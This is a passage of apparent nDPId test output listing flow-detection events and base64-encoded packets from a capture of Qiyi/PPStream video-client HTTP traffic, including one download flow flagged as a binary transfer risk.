0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"} -01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -02166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\/+YwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozOCBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY4MDQ1Mw0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDINClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hlUfxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"} -02175{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsLG1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0cjf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"} -00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="} -00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} -02158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLXL+tKfHtGi\/HbMZpYdZhMeKP9e3jCaJoGjosfkQ4ZHy19+LLw84guwJwa\/9Ktlu8KY6999xP+Bvj4dedshtyDydKvvvvtpgAl+bo9Df8UGtubKMnkHACwN1E2f0AHkBWdSfPUPXvgqln2dD492SUvokzyVkXQIUBlzVcPHCnc7RZ\/tc8u9KmS7DE4xX62EnoAvc5NZI7V3LhTODiXlfWPiUHKvIWIfwP\/LqADGZnMJDNldpH+uBjbrQapZK+fuOPzW+aAnhW3HhZM585sijetOXliLoa9gCkh9INHCiDXhzXcg\/vpxYIPjRXXRxNKvaI6lu226l8Aivkzy1Ny9ARfXWBlelnoZGwRfmfLmmgZCuiCsz3fuI3zBPjtp6Y5lCjP3ys3qsjmcAREVeoX6HcvcPN3UBngDBwvrmf8LWboGH0E0E1SidB66fcT7RcuptRH0x5\/e5snTfjJ4EFA9CrukkQG\/FZos0p8y8x54czaQvEPHMEPAZX7h0tZs\/DkN\/ReyGJTEQpxaNV6fq6+3gxQd2+SVJO7aPbhn8hRvPDN9bpqNOJ7Zgc7I3K66njSmiFz+dSVFIc2\/1k3fB1jp3XQGqBzSntyXs0dPjnRN5uEu40PrYonyiv7LxhgDJ581+h9hajeR9umb6y\/G1bO8f76fQrKANF5s2vWH3Y1ZL49Vi2gxO84af44zk3gWjsg6clhTdn0aCuv5o1+fJ7HejOvlq9wH7kIM8ZPYWKs58nIykrZmgKpkmDDFgj469W6KSD1DorOyspuG9lyxTo4uS39nIpy1TktrmBA\/sRvhvNBg5FmYRnatdE5Od0m5gLOZ70ogIxyF43qD947ySc4pJOCU6qq7JceMxy26QVEyeI0\/lNvcrsugiCyJrtE\/dIvwhSyroxZcyUhkdxI+4ffajndOqztX68qz1fum6uW2EtV17fJf9FTeneF2Mqb71b7Sm6WLVC5O5MxtNRFe86f6Z1f1L29jwXXUVhj"} -02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCxAADIG4NFN6ikjwKhzCABQwBY\/zywDxn1A6VAQAALrNgAALT11Li5gWvs4BXi1xLjmvfKMj0peVQo7lKJXGpIXNwaIVVnV50PDXh\/nhoec299vHndpLUua\/bqpCOjp7McAoWKOkJJNwfqArWbPME9b6btDGVgV0uzbgys3HrUPZGuULZqVvC9cfPh7y1VrCRATr2jIquLGEs7NUuTFUS2\/94Q2D+b6OEydZRO9cPMEkga3a+5FSfXnzkWP45N4tdwDAY3rKF71DNh9qyHNw3zq0kfntg59U62XHN6AJpW5oqhpNP\/KXicl+wTn90pd\/Ux5pxaNuaTtiVisjsDdqJGttkpWFmkIvcN4O3H7Nh+g88QCys9WSrOYR9T1WklqZUIXO2KozevHqrDRk3FhsvxtYk4AY5OTxXPHL2qjoy\/5\/LCO7z9Q0I1UDJ6H3s55a0u\/YyMnFnPMluUDID6DqRJHSb6OUS7lT\/EU7rwQMeL0oaEabUBfFS+XanJaGDL1BZSIyNomFf0DPsUe3djOS8nPpXOhOL\/zzo0NjXvFjylWLV5uSrIEQBYM8WUnB+X2Q2Wcez+wiFByuVMleIMfXAFk2nK\/2ntwKLyC0FBADi6XZL3qNrjHMTQHSC+dvnacGjv84sTgyPra7k8ik3DBtc1vCpiDd8xq36vyCP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEfGu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRygtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4X